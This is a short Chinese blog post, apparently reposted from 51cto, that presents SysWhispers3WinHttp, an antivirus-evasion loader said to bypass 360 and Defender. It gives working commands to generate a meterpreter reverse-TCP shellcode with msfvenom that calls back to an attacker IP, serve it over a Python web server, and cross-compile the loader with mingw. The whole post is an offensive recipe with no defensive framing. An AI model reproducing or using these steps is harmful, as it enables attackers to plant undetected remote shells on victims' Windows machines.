0x01 工具介绍
SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。
0x02 安装与使用
1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.110 lport=4444 -f raw -o beacon.bin
2. 使用python3开启Web服务(或使用CobaltStrike之Host File功能)
python3 -m http.server
3. 修改SysWhispers3WinHttp.c第40行IP地址,使用Linux64位GCC进行交叉编译
x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -O1
ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第40行IP地址,使用Linux32位GCC进行交叉编译
i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp
4、效果展示
标签:SysWhispers3WinHttp,GCC,免杀,mingw32,--,gcc,syscalls,使用 From: https://blog.51cto.com/u_15288375/6494034